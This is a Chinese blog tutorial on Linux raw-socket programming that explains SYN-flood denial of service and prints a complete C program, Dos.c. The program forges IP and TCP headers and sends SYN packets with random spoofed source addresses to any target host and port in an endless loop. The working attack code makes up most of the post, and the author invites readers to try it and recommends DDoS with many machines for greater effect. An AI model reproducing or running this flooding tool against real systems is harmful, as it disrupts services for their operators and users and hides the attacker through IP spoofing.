linux 高级网络编程之自定义ip报文头 Dos

最新推荐文章于 2025-09-15 13:01:02 发布
原创 最新推荐文章于 2025-09-15 13:01:02 发布 · 2.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #socket #Dos #DDos #ip欺骗

本文介绍了DoS(拒绝服务攻击)的基本原理,通过三次握手过程阐述其如何消耗服务器资源。重点讲解了在Linux环境下,如何利用自定义IP头部进行socket编程实现DoS攻击,并提供了相关代码示例。然而,单台机器的攻击往往难以对高性能服务器造成显著影响,因此实践中通常采用DDoS(分布式拒绝服务)攻击,控制多台设备同时发起攻击以影响目标服务器。

一,前言

    Dos(Denial of Service) 即拒绝服务攻击。在建立tcp连接过程中,有三次握手过程,假如客户端向服务器发送连接请求,服务器收到请求并准备建立连接,但客户端假如迟迟不确认连接将损耗服务器的资源。如果这样的请求多了,将严重影响服务器工作。这就是Dos 攻击的基本原理。然而由于单台客户端发送的客户端请求很有限,一般很难对处理能力强的服务器造成影响,所以Dos攻击在实际使用过程中一般采用DDos(Distribute Deny of Service ),分布式拒绝服务攻击,控制多台肉机客户端同时向服务器发送连接请求,以达到使服务器不能工作的目的。


二, 要点及原理分析

    1. 于需要用伪造的ip地址, 所以需要自定义ip头, 这需要对套接字属性进行设置:

int opt = 1;
setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &opt, sizeof(opt));
    2. 为了更方便的填充ip报文头及tcp报文头, 这里需要用到 struct ip 以及 struct tcphdr:

struct ip 

struct ip
  {
#if __BYTE_ORDER == __LITTLE_ENDIAN
    unsigned int ip_hl:4; /* header length */
    unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
    unsigned int ip_v:4; /* version */
    unsigned int ip_hl:4; /* header length */
#endif
    u_int8_t ip_tos; /* type of service */
    u_short ip_len; /* total length */
    u_short ip_id; /* identification */
    u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
    u_int8_t ip_ttl; /* time to live */
    u_int8_t ip_p; /* protocol */
    u_short ip_sum; /* checksum */
    struct in_addr ip_src, ip_dst; /* source and dest address */
  };

struct tcphdr

struct tcphdr {
    __be16 source;
    __be16 dest;
    __be32 seq;
    __be32 ack_seq;
#if defined(__LITTLE_ENDIAN_BITFIELD)
    __u16   res1:4,
            doff:4,
            fin:1,
            syn:1,
            rst:1,
            psh:1,
            ack:1,
            urg:1,
            ece:1,
            cwr:1;
#elif defined(__BIG_ENDIAN_BITFIELD)
    __u16   doff:4,
            res1:4,
            cwr:1,
            ece:1,
            urg:1,
            ack:1,
            psh:1,
            rst:1,
            syn:1,
            fin:1;
#else
#error "Adjust your defines"
#endif
    __be16 window;
    __be16 check;
    __be16 urg_ptr;
};


三, 代码实现

    接下来就可用socket编程来实现Dos 了:

/* *************** Dos.c ************** *
 * author: xiahouzuoping
 * *************************************
 */

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#define LOCALPORT 999

// 校验和函数
unsigned short check_sum(unsigned short *addr, int len);

int main(int argc, char **argv)
{
	if (argc != 3) {
		printf("argument error!\n");
		printf("Dos <serverip> <port>\n");
		exit (1);
	}

	int opt = 1;
	int sockfd; 
	struct sockaddr_in addr;
	struct hostent *host;

	// initialize socket 
	memset( &addr, 0x0, sizeof(struct sockaddr_in));
	addr.sin_family = AF_INET;
	addr.sin_port = htons( atoi(argv[2]));
	if ( inet_aton( argv[1], &addr.sin_addr) == 0)
	{
		host = gethostbyname( argv[1] );
		if ( host == NULL) {
			printf("%s", hstrerror(h_errno));
			exit(1);
		}
		addr.sin_addr = *(struct in_addr *)(host->h_addr_list[0]);
	}

	sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sockfd < 0) {
		printf("%s", strerror(errno));
		exit(1);
	}

	// set socket include ip head
	setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &opt, sizeof(opt));
	
	// create data which only has head, and content is null 
	unsigned char buffer[sizeof(struct ip) + sizeof(struct tcphdr)] ;
	struct ip *ip;
	struct tcphdr  *tcp;
	
	int len = sizeof(buffer);

	memset(buffer, 0x0, sizeof(buffer));
	ip = (struct ip *)buffer;
	tcp = (struct tcphdr *)(buffer + sizeof(struct ip));

        // fill in tcp head, set seq be random ,and syn = 1
	tcp->source = htons(LOCALPORT);
	tcp->dest = addr.sin_port;
	tcp->seq = random();
	tcp->ack_seq = 0;
	tcp->doff = 5;
	tcp->syn = 1;

        // fill in ip head 
	ip->ip_v = IPVERSION;
	ip->ip_hl = sizeof(struct ip)>>2;
	ip->ip_tos = 0;
	ip->ip_len = htons(len);
	ip->ip_id = 0;
	ip->ip_off = 0;

	// ip->ip_ttl = MAXTTL;
	ip->ip_p = IPPROTO_TCP;
	//ip->ip_sum = 0;
	//ip->ip_src.s_addr
	ip->ip_dst = addr.sin_addr;

	while (1) {
		ip->ip_ttl = 0;
		
		ip->ip_sum = htons(sizeof(struct tcphdr));
		ip->ip_src.s_addr = random();

		tcp->check = 0;
		
		tcp->check = check_sum((u_int16_t *)buffer +4, sizeof(buffer) - 8);
		
		ip->ip_ttl = MAXTTL;
		sendto(sockfd, buffer, len, 0, (struct sockaddr *)(&addr), sizeof(struct sockaddr_in));

	}
	
}

u_int16_t check_sum(u_int16_t *buffer, int size)
{
	register int len = size;
	register u_int16_t *p =buffer;
	register u_int32_t cs = 0;

	while ( len >= 2)
	{
		cs += *(p++);
		len -= 2;
	}

	if (1 == len)
	{
		cs += *((unsigned char *)buffer);
	}

	while ( (cs&0xffff0000) != 0) 
		cs = (cs>>16) + (cs&0xffff);

	return (u_int16_t)(~cs);

}

四, 小结与分析

    可以用以上代码去做实际的Dos 攻击实践, 会发现自己本地的网络被占用的非常厉害,好多网页都打不开,而我们原本要攻击的服务器则基本不会受到太大的影响。 出现这样的反差是因为,以上进程用while(1) 循环不断的往外发包,这极大的占用了本地网卡的带宽,造成本地网卡拥堵,而引起其他的网络也用不了。 所以如果真正的要用Dos去干扰一台服务器工作,除非服务器性能远低于我们的客户机,不然的话,光一台客户机是不够的, 我们需要多台客户机同时发动Dos攻击,这就是现实中为什么大多数网络攻击一般是DDos的原因,即用分布式原理控制多台机器发动Dos攻击。




xiahzp
关注
网络编程之原始套接字
m0_74186706的博客
08-02 1050
原始套接字(Raw Socket)是一种套接字类型,它允许用户绕过传输层(如 TCP、UDP)的常规处理,直接与网络层(IP 层)甚至链路层进行交互。在操作系统提供的套接字编程接口中,除了常见的流式套接字(,用于 TCP 协议)和数据报套接字(SOCK_DGRAM,用于 UDP 协议)外,原始套接字以SOCK_RAW标识。特殊应用层协议实现:某些特定的应用场景需要使用自定义的应用层协议,而原始套接字可以提供最灵活的方式来实现这些协议。
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 3296
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
Win2000中用户自定义IP头的实现及OicqSend完整实例源程序
yagami的专栏
09-06 1268
Win2000中用户自定义IP头的实现及OicqSend完整实例源程序by孤独剑客E-mail: janker@371.net HomePage: http://janker.126.com一、引子     前不久我写过一篇叫《个人上网用户自我防护手册》的文章,详细介绍了一般的网络安全常识、如何构建一个安全的个人系统以及在网上冲浪时需要注意的问题等等,旨在帮助广大上网用户学会在网上保护自己。其中曾
linux 构造udp 报文
雏蜂的博客
07-23 1647
1. udp 结构: IP + UDP +data 2. checksum 校验和: IP 为自身的20个字节 UDP 为  伪头部+ UDPhead + data。 其中伪头部为:(伪头部在实际的数据中不进行发送。只是为了接收方进行校验是真的发送给我的。)  struct pseudo_hdr       {           struct in_addr  src;     ...
DOS命令完全详解:从基础到实战,小白也能轻松掌握
最新发布
Flying_Fish_roe的博客
09-15 1408
摘要:DOS命令在现代电脑操作中的实用价值 尽管图形界面普及,DOS命令仍是电脑的底层“手动挡”,在系统修复、磁盘维护、批量操作等场景中不可或缺。DOS通过文字指令管理文件和程序,Windows的“命令提示符”即其现代版本。学习DOS需掌握路径(绝对/相对)、参数(如/p分页显示)和常见错误处理。基础命令如cd切换目录、dir查看文件等,能高效完成文件管理任务。掌握这些技能,可在图形界面失效时快速解决问题,提升电脑操作能力。 (字数:149)
构造IPlinux socket程序
05-30
该程序写了一个客户端与服务器端的程序,客户端可以通过构造IP头,向服务器端发送数据,客户端接收的数据后,打印出构造的IP地址。
linux内核态发送tcp包,linux 内核自组报文发送 3.10版本
weixin_35652867的博客
04-29 419
这个问题纠结了一个星期,现在可以用了。以下是自己在调试过程中一个杂记。新手一个,不合适的地方欢迎大家来喷1,生成一个新包,注意事项直接baidu  skb函数我使用的是alloc_skb,当然也可以用skb_copy_expand等,看个人需求了。2,对新生成的包进行自组内容,就四个部分,二层,三层,四层,和数据内容。不考虑分片。直接skb_share_info一个结构全部0。组包时需要注意,最好...
linux 内核 发包 流程,Linux内核网络报文简单流程
weixin_32780623的博客
04-30 454
linux下的网卡驱动中通常会提供类似XXX_rx的接收函数该函数处理与具体硬件相关的寄存器操作包括中断检查,数据状态检查,错误检查等在确认有数据抵达后读取数据或从DMA的接收环中获取数据地址XXX_rx函数以skb为元数据结构组织报文数据随后调用内核接口函数netif_rx或netif_receive_skb这里会涉及到软中断的处理,NAPI的接收方式但是最后都会走netif_receive_s...
linux网络编程:原始套接字的魔力[上]
11-06
Linux网络编程中,原始套接字(Raw Sockets)是一种特殊的套接字类型,它允许用户空间程序直接访问底层协议,从而可以构建自定义的数据包。与普通的TCP和UDP套接字不同的是,原始套接字提供了对IP头部和更高级别...
Linux网络编程:探索原始套接字的使用
Linux下的原始套接字编程提供了一种强大的工具,让开发者可以直接操作网络数据包,实现高级的网络功能,但也需要开发者具备深厚的网络协议知识。通过掌握原始套接字,开发者可以更好地理解和控制网络通信的细节,为...
Linux网络编程之ICMP洪水攻击代码实例
zyl20120102010的专栏
05-15 2454
1 #include   2 #include   3 #include   4 #include   5 #include   6 #include   7 #include   8 #include   9 #include  10 #include  11 #include  12 #include  13 #include  14 #in
linux_sock_raw原始套接字编程
04-05
linux_sock_raw原始套接字编程
Linux自动封ip,Linux上基于配置文件封ip简单实践
weixin_35741494的博客
05-05 452
iptabels封ip假设封ip 54.95.192.213iptables -I INPUT -p tcp -s 54.95.192.213 -i eth0 -j DROP用nginx配置文件封ipallow和deny指令介绍首先需要我们熟悉nginx 的deny指令allow语法: allow address | CIDR | unix: | all;默认值: —配置段: ...
linux ipproto_ip 头文件,TCP-IP-NetworkNote
weixin_33662430的博客
05-04 1914
开始网络编程理解网络编程和套接字linux 头文件 #include windows 头文件 #include 基于linux平台的实现网络编程结束连接请求的套接字创建过程为1. 调用socket函数创建套接字int socket(int domain,int type ,int protocol);2. 调用bind函数分配IP地址和端口号int bind(int sockfd, struct ...
linux cur自定义header,在Linux系统下使用curl自定义HTTP头的方法
weixin_33895554的博客
05-15 1178
curl是一个强大的命令行工具,它可以通过网络将信息传递给服务器或者从服务器获取数据。他支持很多的传输协议,尤其是HTTP/HTTPS以及其他诸如FTP/FTPS, RTSP, POP3/POP3S, SCP, IMAP/IMAPS协议等。当你使用curl向一个URL发送HTTP请求的时候,它会使用一个默认只包含必要的头部字段(如:User-Agent, Host, and Accept)的HTT...
IPPROTO_IP , IPPROTO_RAW
热门推荐
zimu2702的专栏
01-08 2万+
对于socket(AF_INET, SOCK_RAW, IPPROTO_IP),其原型为 int socket (int domain, int type, int protocol); 1 参数protocol用来指明所要接收的协议包,如果是象IPPROTO_TCP(6)这种非0、非255的协议,当操作系统内核碰到ip头中protocol域和创建socket所使用参数protocol相同的I
linux下获取本地IP信息(没看代码)
jwybobo2007的博客
01-06 2469
#include #include #include #include //#include #include //#include #include #include #include #include //取得本地ip void GetLocalIp(unsigned long *pOutIpAddress) { int fd; struc
linux关于网络的命令介绍
Free雅轩的博客
03-22 2133
需要注意的是,如果配置文件中的主机名是localhost或localhost.localdomain时,系统会取得网络接口的IP地址,并用这个地址找出/etc/hosts文件中对应的主机名,然后将其设置成最终的hostname。当命令ssh后直接跟主机IP时表示使用默认用户root登录,如果是首次登录,需要确认添加该主机的认证key,当输入yes后,即会在本机/root/.ssh/known_hosts中增加一条该主机的记录,下一次登录时就不用再次确认了。真实环境中,流经网卡的数据包量是巨大的。
linux socket 混杂模式,设置混杂模式的例子
weixin_42396058的博客
05-12 868
设置混杂模式的过程一、首先要包含头文件mstcpip.h二、要取得本地的IP地址三、建立一个协议为IPPROTO_IP的原始套接字四、将套接字与本地地址绑定,注意不能与INADDR_ANY进行绑定;五、利用ioctlsocket()函数控制套接字为SIO_RCVALL模式;六、详细代码//得到本地机器名char name[20];int retval;retval=gethostname(name...
探索Linux网络编程:MAC头部报文分析技术
标题中所指的知识点是关于原始套接字(raw socket)在Linux操作系统中的应用,特别是在网络编程领域中对MAC(Media Access Control)头部报文进行分析的实例教程。从描述中,我们可以知道这是一篇网络编程相关的技术...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值